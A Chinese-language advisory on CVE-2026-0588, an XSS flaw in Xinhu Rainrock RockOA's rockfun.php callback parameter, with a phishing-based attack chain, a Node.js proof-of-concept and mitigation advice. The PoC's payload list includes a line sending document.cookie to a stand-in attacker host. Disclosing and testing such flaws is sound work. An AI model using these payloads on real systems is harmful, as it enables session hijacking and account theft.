CVE-2026-0588 Xinhu Rainrock RockOA跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-0588

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Xinhu Rainrock RockOA

漏洞概述

CVE-2026-0588是存在于Xinhu Rainrock RockOA系统中的一个跨站脚本(XSS)漏洞。该漏洞影响RockOA版本直至2.7.1，攻击者可以通过操纵rockfun.php文件中API组件的callback参数来注入恶意脚本代码。由于该漏洞需要用户交互才能触发，且CVSS评分仅为3.5，因此被评定为低危漏洞。然而，攻击者仍可利用此漏洞窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。漏洞利用已在互联网公开，厂商在收到安全通知后未做出任何回应，这使得系统管理员需要自行采取措施进行防护。

技术细节

该漏洞属于存储型或反射型跨站脚本漏洞，根源在于rockfun.php文件中的API接口对用户输入的callback参数缺乏有效的输入验证和输出编码。攻击者可以在callback参数中插入恶意JavaScript代码，如<script>alert(document.cookie)</script>。当其他用户访问包含该恶意代码的页面时，浏览器会执行注入的脚本，从而导致会话劫持、敏感信息泄露等安全问题。由于CVSS向量显示攻击复杂度为低(AC:L)且需要低权限用户参与(PR:L)，具有低权限账户的攻击者即可构造恶意链接并诱骗目标用户点击，实现对目标用户浏览器环境的控制。

攻击链分析

STEP 1

1

侦察阶段：攻击者收集目标Xinhu Rainrock RockOA系统的版本信息，确认版本低于或等于2.7.1

STEP 2

2

账户获取：攻击者获取系统低权限账户（如普通员工账号）

STEP 3

3

Payload构造：攻击者在rockfun.php的callback参数中构造XSS恶意代码

STEP 4

4

社工攻击：攻击者制作包含恶意链接的钓鱼邮件或消息，诱导目标用户点击

STEP 5

5

触发漏洞：目标用户点击链接访问恶意URL，浏览器执行注入的JavaScript代码

STEP 6

6

会话劫持：攻击者通过恶意脚本获取用户cookie或敏感信息，进而劫持用户账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-0588 PoC - Xinhu Rainrock RockOA XSS via callback parameter
// Target: http://[target]/rockfun.php

const http = require('http');

function exploitXSS(targetUrl, callbackPayload) {
    // Construct malicious URL with XSS payload in callback parameter
    const maliciousUrl = `${targetUrl}?callback=${encodeURIComponent(callbackPayload)}`;
    
    console.log('[*] Target URL:', maliciousUrl);
    console.log('[*] Payload:', callbackPayload);
    
    // Simulate HTTP request to trigger vulnerability
    const url = new URL(maliciousUrl);
    const options = {
        hostname: url.hostname,
        port: url.port || 80,
        path: url.pathname + url.search,
        method: 'GET',
        headers: {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml'
        }
    };
    
    const req = http.request(options, (res) => {
        console.log(`[+] Status Code: ${res.statusCode}`);
        let data = '';
        res.on('data', (chunk) => { data += chunk; });
        res.on('end', () => {
            // Check if payload is reflected in response
            if (data.includes(callbackPayload)) {
                console.log('[!] VULNERABLE: XSS payload reflected in response');
            } else {
                console.log('[-] Not vulnerable or payload filtered');
            }
        });
    });
    
    req.on('error', (e) => {
        console.error('[-] Request failed:', e.message);
    });
    
    req.end();
}

// Example payloads
const payloads = [
    '<script>alert(document.domain)</script>',
    '<img src=x onerror=alert(document.cookie)>',
    '<svg/onload=fetch("http://attacker.com/steal?c="+document.cookie)>'
];

// Execute exploit
const target = 'http://target-server/rockfun.php';
payloads.forEach((payload, i) => {
    console.log(`\n[*] Testing payload ${i + 1}...`);
    exploitXSS(target, payload);
});

影响范围

Xinhu Rainrock RockOA <= 2.7.1

防御指南

临时缓解措施

由于厂商未回应安全通知，建议管理员临时禁用或限制rockfun.php的访问，对所有用户输入实施白名单过滤策略，使用DOMPurify等库对输出内容进行严格消毒，并加强对用户的安全意识培训以防范钓鱼攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0588
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0588
3 Details https://www.cvedetails.com/cve/CVE-2026-0588/
4 VulDB https://vuldb.com/cve/CVE-2026-0588
5 Link https://vuldb.com/?ctiid.339494
6 Link https://vuldb.com/?id.339494
7 Link https://vuldb.com/?submit.725397
8 Link https://vuldb.com/?submit.725397